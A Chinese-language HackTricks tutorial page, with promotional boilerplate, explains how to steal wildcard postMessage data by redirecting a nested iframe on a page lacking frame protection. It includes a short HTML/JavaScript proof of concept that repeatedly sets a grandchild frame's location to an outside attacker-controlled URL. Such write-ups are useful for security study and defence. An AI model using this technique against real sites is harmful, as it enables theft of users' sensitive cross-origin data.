Steal postmessage modifying iframe location

从零开始学习 AWS 黑客技术，成为专家 htARTE（HackTricks AWS 红队专家）！

您在网络安全公司工作吗？想要在 HackTricks 中看到您的公司广告？或者想要访问PEASS 的最新版本或下载 HackTricks 的 PDF？请查看订阅计划！
发现我们的独家NFTs 集合 - The PEASS Family
获取官方 PEASS & HackTricks 商品
加入 💬 Discord 群组 或 电报群组 或在 Twitter 上关注我 🐦@carlospolopm。
通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享您的黑客技巧。

更改子 iframe 位置

根据这篇文章，如果您可以在没有 X-Frame-Header 的网页中嵌入包含另一个 iframe 的网页，您可以更改该子 iframe 的位置。

例如，如果 abc.com 将 efg.com 作为 iframe，并且 abc.com 没有 X-Frame 头，我可以使用 frames.location 将 efg.com 更改为恶意网站 evil.com，跨源。

这在postMessages中特别有用，因为如果页面使用类似 windowRef.postmessage("","*") 这样的通配符发送敏感数据，就有可能更改相关 iframe（子级或父级）的位置到攻击者控制的位置，从而窃取这些数据。

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

你在网络安全公司工作吗？想要看到你的公司在HackTricks上宣传吗？或者想要获取PEASS的最新版本或下载HackTricks的PDF吗？查看订阅计划!
探索PEASS家族，我们独家的NFTs
获取官方PEASS & HackTricks周边
加入 💬 Discord群 或 电报群 或关注我的Twitter 🐦@carlospolopm。
通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。

上一页Bypassing SOP with Iframes - 2 下一页Proxy / WAF Protections Bypass

最后更新于1年前